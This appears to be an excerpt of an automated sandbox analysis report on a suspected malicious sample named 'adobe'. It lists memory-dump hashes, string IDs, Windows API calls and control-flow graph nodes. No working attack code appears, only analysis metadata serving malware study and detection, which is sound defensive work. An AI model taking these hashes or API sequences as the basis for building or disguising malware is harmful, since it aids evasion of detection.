                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae27808c4a5e35eac9878fcfec7a79549ebea6da12b1a15dc9f3771cf4896171
                                                  • Instruction ID: 11bdf1c33ed5b55a6e1e5a1b3761036ba073147889507019b6f67424c3a5145d
                                                  • Opcode Fuzzy Hash: ae27808c4a5e35eac9878fcfec7a79549ebea6da12b1a15dc9f3771cf4896171
                                                  • Instruction Fuzzy Hash: 8F328D34A002199FDB54EF68D990BADB7B6EF88320F108525E806FB355DB35EC46CB91
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 47bde833b278e4ece7093592c46533e1a4bf61eb9841d20794d44533413f313f
                                                  • Instruction ID: fc125eca6856f20f1133d628b83742a6819ad893bc3ff6198d97b4a0a2a78fa3
                                                  • Opcode Fuzzy Hash: 47bde833b278e4ece7093592c46533e1a4bf61eb9841d20794d44533413f313f
                                                  • Instruction Fuzzy Hash: B2224E70E102198FDF64EF68D5907ADB7A6EB55310F208826F409EF395DA35DC81CBA1

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: be8ed3111eb14af356af0f86c8c384dc65e23286c93ce0364b641a2a99d0ac6c
                                                  • Instruction ID: 2c6fd1f55169cd8162f17b10130510b617fc9bb80ffae4c054dd4687f8ccf3c5
                                                  • Opcode Fuzzy Hash: be8ed3111eb14af356af0f86c8c384dc65e23286c93ce0364b641a2a99d0ac6c
                                                  • Instruction Fuzzy Hash: E0E16030E102298FCB69EF68D5906AEB7B6FF85304F208529E945EB354DB34DC46CB91

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: f6d3694aebbfcbdaae35d22c07090c64b10f8bb4a416c72028054f59da0c7efc
                                                  • Instruction ID: 39d3bfbf26729b75f6ba3469172001746f8a61cc5193565e08a39d7501b65277
                                                  • Opcode Fuzzy Hash: f6d3694aebbfcbdaae35d22c07090c64b10f8bb4a416c72028054f59da0c7efc
                                                  • Instruction Fuzzy Hash: 5D026B30E002198FDBA4EF68D5806ADB7B2EF55300F24856AE409EF255DB34DD85CBA1

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 5284ad492c16e41eb4cf590baf0e44be736990fa9784b8008a0f7ceccdc0b33e
                                                  • Instruction ID: 6decc6fc34fb9742e5485a51d3e8e5fd503d610ec2170c0d87331c6754e3b877
                                                  • Opcode Fuzzy Hash: 5284ad492c16e41eb4cf590baf0e44be736990fa9784b8008a0f7ceccdc0b33e
                                                  • Instruction Fuzzy Hash: 7E915130B0021A9FDB95EF65D950BAFB7F6BF84304F108569D409EB348EE709D468B92

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q
                                                  • API String ID: 0-182748909
                                                  • Opcode ID: 23bc0daf7c8cba55d19a1c1a27db72120e91b8cec37a7bfbfe1c94c35b84417b
                                                  • Instruction ID: aaa1c323856c5601efd81fb96cabd1cf50667154c361192a512318af369441eb
                                                  • Opcode Fuzzy Hash: 23bc0daf7c8cba55d19a1c1a27db72120e91b8cec37a7bfbfe1c94c35b84417b
                                                  • Instruction Fuzzy Hash: 06622D30A0021ACFCB55FF68E590A5DB7A6FF84304B608A69E005DF369DB75ED46CB81

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq$\Obq
                                                  • API String ID: 0-4057264190
                                                  • Opcode ID: b6a8295c98e29cb9d3cb6e9da2acb4425762665a22cea791c5b06a1d8f71682e
                                                  • Instruction ID: 39207c179b3a1f3806aca6a74489040c0b6da860bb33f61c77732303f8f1f7a6
                                                  • Opcode Fuzzy Hash: b6a8295c98e29cb9d3cb6e9da2acb4425762665a22cea791c5b06a1d8f71682e
                                                  • Instruction Fuzzy Hash: 7861A130F002199FEB54AFA4C854BAEBBF6FF88700F208029E106EB395DB744C418B91

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq
                                                  • API String ID: 0-2292610095


                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0125EE8F
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2241208324.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1250000_adobe.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Obq
                                                  • API String ID: 0-2878401908
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2239585356.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_fdd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef508d753d8444296732f90964a135b381005c9ba4a0866c603cd292d4f6e184
                                                  • Instruction ID: 0e0b98d179036c9a759d754c34a0d5aadf1bfec5af9017a4a3dfca885c9d6fa7
                                                  • Opcode Fuzzy Hash: ef508d753d8444296732f90964a135b381005c9ba4a0866c603cd292d4f6e184
                                                  • Instruction Fuzzy Hash: 6321F571504204DFDB15DF14D984B26BB66FBC4324F28C56AD90A4B35AC33AD846EA62
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 312b0ef3b28dae17a9ede5755c4560ce455a05c4d7ffd4df58aea37273e71e91
                                                  • Instruction ID: 72ec9abafb28a0af5d4792be9ca946fdb234058fac1556dbfc5bc9327d6574de
                                                  • Opcode Fuzzy Hash: 312b0ef3b28dae17a9ede5755c4560ce455a05c4d7ffd4df58aea37273e71e91
                                                  • Instruction Fuzzy Hash: 06012230B002210FCB61AAEDD910BABB7DBDFC9710F10846AF50ADB341DE24CC024395
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 709efbace9df3c57668a2d4795efa4f654591f675080720be71a1ac675f72bd1
                                                  • Instruction ID: 78a696b85b677b835dad6b7c52f2e8df6095b02af1e85d7f73a4d1dfc2e9516a
                                                  • Opcode Fuzzy Hash: 709efbace9df3c57668a2d4795efa4f654591f675080720be71a1ac675f72bd1
                                                  • Instruction Fuzzy Hash: FA116132B101259FDF58A668D8146AE73EAEBCD211F108539D50AEB344EF69DC068BD2
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60a29b6351760fb2431b13cba225de0e8d0897cae7401a8956179f8c108e926c
                                                  • Instruction ID: 5f8973fb42e33423f24f57e47aad41d3dd514f4fd5f45ca5362f404b34bb4060
                                                  • Opcode Fuzzy Hash: 60a29b6351760fb2431b13cba225de0e8d0897cae7401a8956179f8c108e926c
                                                  • Instruction Fuzzy Hash: AA0128397002215FC752AB38D850BAFB7DAEB86710F104539F64ACB351DE25DD428381
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c6605d07ea8dce440e9a8780636393fa84f8f7e84fe93bda1f59b9f04a0e4c0
                                                  • Instruction ID: 2df67bdbb259f232017f3f7499a146031aa1af7507fff7a32c884f70ccf7e0cb
                                                  • Opcode Fuzzy Hash: 1c6605d07ea8dce440e9a8780636393fa84f8f7e84fe93bda1f59b9f04a0e4c0
                                                  • Instruction Fuzzy Hash: E101BC32B100265BDF54A668DC247EB76EB9BC9611F01813AE11AE7294EF29CC0347E2
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55511c88f1bd06eaa2f0023d70df75979c5d4df72f5efcbaf1229d36434015c0
                                                  • Instruction ID: 6c65f2a1c27a6125cc01c076775e00b709b371cffefc832611cd946973dc795e
                                                  • Opcode Fuzzy Hash: 55511c88f1bd06eaa2f0023d70df75979c5d4df72f5efcbaf1229d36434015c0
                                                  • Instruction Fuzzy Hash: D221F4B1D01259AFCB00DF9AD884ADEFBF8FF48310F10812AE918A7200C378A554CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5fd82f8428500c1ccfef51bed0587c3bf7d510d00c29c5e16435b1b64d51c2a
                                                  • Instruction ID: 22fad43e9c775412d32edbfa20d2be64a09875d7ab0510a2048a91c097f5e258
                                                  • Opcode Fuzzy Hash: f5fd82f8428500c1ccfef51bed0587c3bf7d510d00c29c5e16435b1b64d51c2a
                                                  • Instruction Fuzzy Hash: 34012436F200614FCB65A2B89460B6FA7C6DBC9214F0088B9F50ECB341CE24DC434381
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a57dad3f351fecd1e901b43f11e5da60611b475f88ce07e0c042de974debc9f6
                                                  • Instruction ID: 1580094d333fa14d551909427667356698916fbf92fbae93ae06e6c44f3ce75c
                                                  • Opcode Fuzzy Hash: a57dad3f351fecd1e901b43f11e5da60611b475f88ce07e0c042de974debc9f6
                                                  • Instruction Fuzzy Hash: C111B3B5D01259AFCB00DF9AD884ADEFFF4FB49710F10852AE518A7240C378A554CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44160ce133de46e1c74099897c7129dcefdf415278b8ae39bc007de1801f7833
                                                  • Instruction ID: 0094cfde413e950cee05d4ca6c2cfe0df59e4dec7451cf91a79e4925178d0010
                                                  • Opcode Fuzzy Hash: 44160ce133de46e1c74099897c7129dcefdf415278b8ae39bc007de1801f7833
                                                  • Instruction Fuzzy Hash: 6101AD31B005210BDB64A6EDD514B6AB6CADBC9711F10843AF60EDB340EE65DC024385
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bdc38ddf0570d241acecce64b82d5d84e29381b134209fbd9979d3409ce54f8f
                                                  • Instruction ID: 6028effcfe356398fdb65b1f79380834bfda4cbb4d8d359ad39d342d89ad4368
                                                  • Opcode Fuzzy Hash: bdc38ddf0570d241acecce64b82d5d84e29381b134209fbd9979d3409ce54f8f
                                                  • Instruction Fuzzy Hash: 0A01D139F201214FCB65A6ADA554B2EB6CADBC9624F10847AF50ECB350DE25DC034385
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 367e82fe763a261c7006bc56e417745754a8ab310a3c9f5d35892815029bbab6
                                                  • Instruction ID: 048130fb31824e505f0fd3f4567cfba1ba6b2f9cb9bb8d03f0e0f74267d0c22c
                                                  • Opcode Fuzzy Hash: 367e82fe763a261c7006bc56e417745754a8ab310a3c9f5d35892815029bbab6
                                                  • Instruction Fuzzy Hash: 18018135B101254BCB55AB78D450B2EB3D6EB89714F108428F64ECB354EE25DC468781
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c949806674b15ebeae97a3a5d3a43be2fc99bcf0521cbb443e59a459260b97c5
                                                  • Instruction ID: d99ff77b3a583ca703045a62d9e43fb9512165157894cbdb09c18a79ad3daea6
                                                  • Opcode Fuzzy Hash: c949806674b15ebeae97a3a5d3a43be2fc99bcf0521cbb443e59a459260b97c5
                                                  • Instruction Fuzzy Hash: D9E09270E182696BDB60DF709B5535A77ACDB02204F2044AAF844CB106E275DE018790
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-2843079600
                                                  • Opcode ID: 95ed0c1bc9f7025a5f714cbd8ed7d123fa77b864443c0b3867d6c8ab68f600ad
                                                  • Instruction ID: 06349e2065c0d07a3feb8091f4bdbc50cd246f2a6ccaa7792b7e0a1b9104317e
                                                  • Opcode Fuzzy Hash: 95ed0c1bc9f7025a5f714cbd8ed7d123fa77b864443c0b3867d6c8ab68f600ad
                                                  • Instruction Fuzzy Hash: 2D122E70E002298FDB64EF65C994AADB7F6BF84304F208569E40AAB354EB31DD45CF85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: 62ad0814bcc7d60f356bf6aaf48971513f1835baebb1f10e683cbc6380c636c0
                                                  • Instruction ID: 7f59e43e9fdc2096c4f7684b0d4f67b0aa8e8900ff27cc1a5292f09e35b7cc3d
                                                  • Opcode Fuzzy Hash: 62ad0814bcc7d60f356bf6aaf48971513f1835baebb1f10e683cbc6380c636c0
                                                  • Instruction Fuzzy Hash: 69919130E00229DFDBA8EFA5D994B6EB7F6FF44300F108429E981AB254DB359D45CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-981061697
                                                  • Opcode ID: 8fe92edff962c18253686480bc018a79a756ba38fa356901f2170e1b31c15035
                                                  • Instruction ID: 9fe9f6c5554a89d1c7b8076aeafcfe6db07aac4dbb32e14e7798d6e917459db0
                                                  • Opcode Fuzzy Hash: 8fe92edff962c18253686480bc018a79a756ba38fa356901f2170e1b31c15035
                                                  • Instruction Fuzzy Hash: 0EF15070B00215CFDB59EFA5D994B6EB7B6BF84300F248468E8059B368DB35EC42CB95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 3969d0745640e78783e9dab0674154dff9db6bc30aeb9a3c4ec3dd2da0e85fe6
                                                  • Instruction ID: 866e971aff11faeb96fafab566b9f0ec3e74e5971c41064da81ffc61914a0c8e
                                                  • Opcode Fuzzy Hash: 3969d0745640e78783e9dab0674154dff9db6bc30aeb9a3c4ec3dd2da0e85fe6
                                                  • Instruction Fuzzy Hash: 72B12D30A102198FDB58EF69D990BAEB7B6FF84304F248429E405DB355DB79DC86CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                  • API String ID: 0-3527005858
                                                  • Opcode ID: bc5a00fd6476329629afb8c3e836b5109d1a71473f294872b521054c1e6ee888
                                                  • Instruction ID: 213d69ffc43775100e47384c64b0d6c54f48a44495f37cd98b3e4a0d3dc770bc
                                                  • Opcode Fuzzy Hash: bc5a00fd6476329629afb8c3e836b5109d1a71473f294872b521054c1e6ee888
                                                  • Instruction Fuzzy Hash: 1C518C30B002119FDB58EB28D991B6AB7FAFF84344F148568F406DB3A9DA34EC45CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 95917d143748ab648f4db4cc8017c10d9c15f60ca89889aecc14b698282d2524
                                                  • Instruction ID: 8cbbefa0322a369746b386dae769f82d3db0cf06d3a283f17ad3eb41862883c9
                                                  • Opcode Fuzzy Hash: 95917d143748ab648f4db4cc8017c10d9c15f60ca89889aecc14b698282d2524
                                                  • Instruction Fuzzy Hash: 1B51A230A102258FCFA9EB64D980AADB3F6EF85340F248529E945EB354DB35DC41CB91

                                                  Execution Graph

                                                  Execution Coverage:7.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:39
                                                  Total number of Limit Nodes:4
                                                  execution_graph 21970 2884668 21971 288467a 21970->21971 21972 2884686 21971->21972 21974 2884779 21971->21974 21975 288477c 21974->21975 21979 2884888 21975->21979 21983 2884878 21975->21983 21981 28848af 21979->21981 21980 288498c 21980->21980 21981->21980 21987 2884248 21981->21987 21985 288487c 21983->21985 21984 288498c 21984->21984 21985->21984 21986 2884248 CreateActCtxA 21985->21986 21986->21984 21988 2885918 CreateActCtxA 21987->21988 21990 28859db 21988->21990 21991 288ad68 21994 288ae50 21991->21994 21992 288ad77 21995 288ae94 21994->21995 21996 288ae71 21994->21996 21995->21992 21996->21995 21997 288b098 GetModuleHandleW 21996->21997 21998 288b0c5 21997->21998 21998->21992 21999 288d218 22000 288d25e 21999->22000 22004 288d3f8 22000->22004 22007 288d3e7 22000->22007 22001 288d34b 22005 288d426 22004->22005 22010 288b4c0 22004->22010 22005->22001 22008 288b4c0 DuplicateHandle 22007->22008 22009 288d426 22008->22009 22009->22001 22011 288d460 DuplicateHandle 22010->22011 22013 288d4f6 22011->22013 22013->22005 22014 4f78f60 22015 4f78f64 22014->22015 22016 4f790eb 22015->22016 22018 4f76b08 22015->22018 22019 4f791e0 PostMessageW 22018->22019 22020 4f7924c 22019->22020 22020->22015

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 295 288ae50-288ae6f 296 288ae9b-288ae9f 295->296 297 288ae71-288ae7e call 2889dc0 295->297 299 288aea1-288aeab 296->299 300 288aeb3-288aef4 296->300 303 288ae80 297->303 304 288ae94 297->304 299->300 306 288af01-288af0f 300->306 307 288aef6-288aefe 300->307 352 288ae86 call 288b4f8 303->352 353 288ae86 call 288b4e9 303->353 354 288ae86 call 288b4d0 303->354 304->296 308 288af11-288af16 306->308 309 288af33-288af35 306->309 307->306 311 288af18-288af1f call 2889dcc 308->311 312 288af21 308->312 314 288af38-288af3f 309->314 310 288ae8c-288ae8e 310->304 313 288afd0-288b04e 310->313 316 288af23-288af31 311->316 312->316 345 288b050-288b053 313->345 346 288b054-288b090 313->346 317 288af4c-288af53 314->317 318 288af41-288af49 314->318 316->314 321 288af60-288af69 call 2889ddc 317->321 322 288af55-288af5d 317->322 318->317 326 288af6b-288af73 321->326 327 288af76-288af7b 321->327 322->321 326->327 328 288af99-288afa6 327->328 329 288af7d-288af84 327->329 336 288afa8-288afc6 328->336 337 288afc9-288afcf 328->337 329->328 331 288af86-288af96 call 2889dec call 2889dfc 329->331 331->328 336->337 345->346 347 288b098-288b0c3 GetModuleHandleW 346->347 348 288b092-288b095 346->348 349 288b0cc-288b0e0 347->349 350 288b0c5-288b0cb 347->350 348->347 350->349 352->310 353->310 354->310
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0288B0B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: $O$$O
                                                  • API String ID: 4139908857-2259736977

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 464 288590d-288590e 465 2885910-2885912 464->465 466 2885914 464->466 465->466 467 2885918-28859d9 CreateActCtxA 465->467 466->467 469 28859db-28859e1 467->469 470 28859e2-2885a3c 467->470 469->470 477 2885a4b-2885a4f 470->477 478 2885a3e-2885a41 470->478 479 2885a60-2885a90 477->479 480 2885a51-2885a5d 477->480 478->477 484 2885a42-2885a47 479->484 485 2885a92-2885b14 479->485 480->479 484->477
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 028859C9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 2884248-28859d9 CreateActCtxA 491 28859db-28859e1 488->491 492 28859e2-2885a3c 488->492 491->492 499 2885a4b-2885a4f 492->499 500 2885a3e-2885a41 492->500 501 2885a60-2885a90 499->501 502 2885a51-2885a5d 499->502 500->499 506 2885a42-2885a47 501->506 507 2885a92-2885b14 501->507 502->501 506->499
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 028859C9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0

                                                  Control-flow Graph

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288D426,?,?,?,?,?), ref: 0288D4E7
                                                  Memory Dump Source
